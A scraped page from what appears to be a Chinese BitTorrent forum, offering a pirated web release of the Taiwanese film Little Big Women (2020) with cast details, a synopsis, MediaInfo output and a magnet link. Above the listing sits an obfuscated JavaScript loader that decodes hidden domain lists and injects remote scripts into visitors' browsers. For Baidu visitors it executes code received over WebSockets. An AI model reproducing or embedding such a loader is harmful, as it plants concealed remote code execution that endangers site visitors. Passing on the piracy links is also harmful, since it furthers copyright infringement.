孤味[繁体字幕]Little.Big.Women.2020.Netflix.WEB-DL.1080p.x264.DDP5.1-迅雷下载 3.94GB

版主小s 9天前 303

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译  名 孤味 / Little Big Women / Guo Mie
◎年  代 2020
◎产  地 中国台湾
◎类  别 剧情 / 家庭
◎语  言 汉语普通话 / 闽南话
◎上映日期 2020-11-06(中国台湾) / 2021-02-05(中国台湾网络)
◎IMDb链接 https://www.imdb.com/title/tt12397078/
◎豆瓣评分 8.1/10 (47217人评价)
◎豆瓣链接 https://movie.douban.com/subject/34805873/
◎片  长 123分钟
◎导  演 许承杰 Joseph Chen-Chieh Hsu (id:1411383)
◎编  剧 许承杰 Joseph Chen-Chieh Hsu (id:1411383)
       黄怡玫 Maya Huang (id:1382747)
◎演  员 陈淑芳 Shu-Fang Chen (id:1339273)
       谢盈萱 Ying-Hsuan Hsieh (id:1360505)
       孙可芳 Ke-Fang Sun (id:1390693)
       丁宁 Ning Ding (id:1319882)
       陈姸霏 Buffy Chen (id:1445350)
       张钧甯 Chun-Ning Chang (id:1257882)
       杨一展 Leroy Yang (id:1315912)
       张翰 Han Chang (id:1006354)
       龙劭华 Siu Wa Lung (id:1316680)
       洪胜德 Honduras (id:1324552)
       琇琴 Sara Yu (id:1358339)
       杨闵 Ming Yang (id:1365777)
       许怀民 Hsu Huaimin (id:1451216)
       庄心瑜 Hsin-Yu Chuang (id:1366720)
       蔡海殷 Tsai Hai-Yin (id:1451217)
       陈家逵 Chia-Kuei Chen (id:1397063)
       林钰芠 Yu-Wen Lin (id:1451304)
       廖庆松 Ching-Song Liao (id:1312523)
       刘宛玲 Jacqueline W. Liu (id:1379183)
       陈郁佳 Tiffany Yu-Chia Chen (id:1451204)
       吴明宪 Ming-Hsien Wu (id:1396931)
       林逸心 Elisa Y.H. Lin (id:1451205)
       杨宥瑜 Yuyu Yang (id:1379182)
       何伯勋 Pohsun He (id:1451206)
       刘怡君 Yi-Chun Liu (id:1451213)
       柯智豪 Zhihao Ke (id:1451208)
       Jon Keng    Jon Keng (id:1451207)
       陈瑞杰 Rui-Jie Chen (id:1451220)
       廖庆松 Ching-Song Liao (id:1312523)
       陈俊宏 Chun-Hung Chen (id:1405906)
       游惠雯 Katia Yu (id:1451212)
       陈荧德 Ying-Te Julie Chen (id:1384899)
       林育妘 Emma Lin (id:1370243)
       苏庭卉 Zoey Su (id:1451210)
       张雅钧 Steven Chang (id:1451214)
       邓茜云 Chien-Yun Teng (id:1451215)
       杨书昕 Agnes Yang (id:1451209)
       严唯甄 Morgan Yen (id:1451211)

◎标  签 家庭 / 台湾 / 台湾电影 / 2020 / 电影 / 徐若瑄 / 谢盈萱 / 陈淑芳

◎简  介
  林秀英(陈淑芳 饰)是台南赫赫有名的餐厅老板,在丈夫(龙劭华 饰)无声无息地离家后,便靠著卖虾卷独自抚养三个女儿长大成人,不仅把虾卷从路边摊卖到开餐厅,三个女儿更是成就非凡,大女儿阿青(谢盈萱 饰)是国际舞者,二女儿阿瑜(徐若瑄 饰)在台北当整形医生,小女儿佳佳(孙可芳 饰)则接手自己的餐厅事业。眼看就要苦尽甘来,秀英却在70大寿当天接到丈夫离世的噩耗,在替这位有名无实的丈夫筹办丧礼的同时,竟意外迎来了另一位陪伴丈夫度过晚年的女人,令她不得不再次面对内心埋藏已久的怨怼……

  1. General
  2. Unique ID                                : 267294521912288935573503306372383828858 (0xC9170D6842F3D70ABBE3C1804854EB7A)
  3. Complete name                            : 孤味[email protected]QDDQ.COM.mkv
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 3.93 GiB
  7. Duration                                 : 2 h 3 min
  8. Overall bit rate                         : 4 575 kb/s
  9. Encoded date                             : UTC 2021-07-17 10:56:44
  10. Writing application                      : mkvmerge v58.0.0 ('Supper's Ready') 64-bit
  11. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  12. Video
  13. ID                                       : 1
  14. Format                                   : AVC
  15. Format/Info                              : Advanced Video Codec
  16. Format profile                           : [email protected]
  17. Format settings                          : CABAC / 4 Ref Frames
  18. Format settings, CABAC                   : Yes
  19. Format settings, Reference frames        : 4 frames
  20. Codec ID                                 : V_MPEG4/ISO/AVC
  21. Duration                                 : 2 h 3 min
  22. Bit rate                                 : 3 933 kb/s
  23. Width                                    : 1 920 pixels
  24. Height                                   : 1 080 pixels
  25. Display aspect ratio                     : 16:9
  26. Frame rate mode                          : Constant
  27. Frame rate                               : 24.000 FPS
  28. Color space                              : YUV
  29. Chroma subsampling                       : 4:2:0
  30. Bit depth                                : 8 bits
  31. Scan type                                : Progressive
  32. Bits/(Pixel*Frame)                       : 0.079
  33. Stream size                              : 3.38 GiB (86%)
  34. Default                                  : Yes
  35. Forced                                   : No
  36. Audio
  37. ID                                       : 2
  38. Format                                   : E-AC-3
  39. Format/Info                              : Enhanced AC-3
  40. Commercial name                          : Dolby Digital Plus
  41. Codec ID                                 : A_EAC3
  42. Duration                                 : 2 h 3 min
  43. Bit rate mode                            : Constant
  44. Bit rate                                 : 640 kb/s
  45. Channel(s)                               : 6 channels
  46. Channel layout                           : L R C LFE Ls Rs
  47. Sampling rate                            : 48.0 kHz
  48. Frame rate                               : 31.250 FPS (1536 SPF)
  49. Compression mode                         : Lossy
  50. Delay relative to video                  : -83 ms
  51. Stream size                              : 564 MiB (14%)
  52. Language                                 : Nauru
  53. Service kind                             : Complete Main
  54. Default                                  : Yes
  55. Forced                                   : No
  56. Text #1
  57. ID                                       : 3
  58. Format                                   : UTF-8
  59. Codec ID                                 : S_TEXT/UTF8
  60. Codec ID/Info                            : UTF-8 Plain Text
  61. Duration                                 : 2 h 1 min
  62. Bit rate                                 : 43 b/s
  63. Count of elements                        : 1333
  64. Stream size                              : 38.4 KiB (0%)
  65. Title                                    : English
  66. Language                                 : English
  67. Default                                  : Yes
  68. Forced                                   : No
  69. Text #2
  70. ID                                       : 4
  71. Format                                   : UTF-8
  72. Codec ID                                 : S_TEXT/UTF8
  73. Codec ID/Info                            : UTF-8 Plain Text
  74. Duration                                 : 2 h 1 min
  75. Bit rate                                 : 67 b/s
  76. Count of elements                        : 1193
  77. Stream size                              : 60.0 KiB (0%)
  78. Title                                    : Japanese
  79. Language                                 : Japanese
  80. Default                                  : Yes
  81. Forced                                   : No
  82. Text #3
  83. ID                                       : 5
  84. Format                                   : UTF-8
  85. Codec ID                                 : S_TEXT/UTF8
  86. Codec ID/Info                            : UTF-8 Plain Text
  87. Duration                                 : 2 h 1 min
  88. Bit rate                                 : 47 b/s
  89. Count of elements                        : 1429
  90. Stream size                              : 42.6 KiB (0%)
  91. Title                                    : Korean
  92. Language                                 : Korean
  93. Default                                  : Yes
  94. Forced                                   : No
  95. Text #4
  96. ID                                       : 6
  97. Format                                   : UTF-8
  98. Codec ID                                 : S_TEXT/UTF8
  99. Codec ID/Info                            : UTF-8 Plain Text
  100. Duration                                 : 1 h 55 min
  101. Bit rate                                 : 39 b/s
  102. Count of elements                        : 1405
  103. Stream size                              : 33.4 KiB (0%)
  104. Title                                    : 簡体
  105. Language                                 : Chinese
  106. Default                                  : Yes
  107. Forced                                   : No
  108. Text #5
  109. ID                                       : 7
  110. Format                                   : UTF-8
  111. Codec ID                                 : S_TEXT/UTF8
  112. Codec ID/Info                            : UTF-8 Plain Text
  113. Duration                                 : 1 h 55 min
  114. Bit rate                                 : 39 b/s
  115. Count of elements                        : 1405
  116. Stream size                              : 33.4 KiB (0%)
  117. Title                                    : 繁體
  118. Language                                 : Chinese
  119. Default                                  : Yes
  120. Forced                                   : No


TAGS 剧情 家庭

磁力链:
  • magnet:?xt=urn:btih:17E3C49578C40937A9C230D4B0CCAFBF48A7C149
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回